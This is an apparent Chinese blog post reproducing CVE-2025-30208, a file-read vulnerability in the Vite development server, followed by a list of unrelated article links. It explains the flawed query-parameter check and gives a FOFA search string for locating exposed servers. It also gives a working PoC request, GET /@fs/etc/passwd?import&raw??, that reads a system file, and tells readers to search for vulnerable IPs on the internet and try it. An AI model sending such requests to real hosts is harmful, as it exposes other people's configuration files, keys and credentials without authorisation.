当前位置: 首页 > news >正文

CVE-2025-30208(文件读取)漏洞复现

一:漏洞信息

    CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。

二:漏洞原理

    漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?raw??或?import&raw??**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。

三:漏洞复现

1.fofa:body="/@vite/client"

   poc:GET /@fs/etc/passwd?import&raw?? HTTP/1.1
             Host: xx.xx.xx.xx

2.在fofa搜索,寻找存在漏洞ip

3.尝试传参,得到相关信息。

相关文章:

  • 【算法手记7】拼三角
  • 将代理连接到 Elasticsearch 使用模型上下文协议
  • 北大人工智能研究院朱松纯:“中国的AI叙事” 存在认知偏差
  • 告别API限费!开源Word/PPT一键生成工具——企业级AIGC自由方案
  • LiteDB 数据库优缺点分析与C#代码示例
  • 【鸿蒙5.0】向用户申请麦克风授权
  • Seata AT模式的一些常见问题及其源码解析
  • JVM原理
  • 室内环保产业观察2025.3.30
  • Mybatis_Plus中的常用注解
  • ollama在win10安装、使用、卸载
  • 【百日精通 JAVA | SQL篇 | 第一篇】初识数据库
  • 从一到无穷大 #44:AWS Glue: Data integration + Catalog
  • 【Matlab】-- 基于MATLAB的飞蛾扑火算法与反向传播算法的混凝土强度预测
  • Python 的 pyautogui 写个简单 关闭广告 和 刷视频 程序
  • 19914 最小生成树2
  • 《Mycat核心技术》第21章:高可用负载均衡集群的实现(HAProxy + Keepalived + Mycat)
  • 小豆包api:gpt-4o模型api已接入,出图更稳定
  • 推荐系统(十九):优势特征蒸馏(Privileged Features Distillation)在商品推荐中的应用(二)
  • DOM 加载函数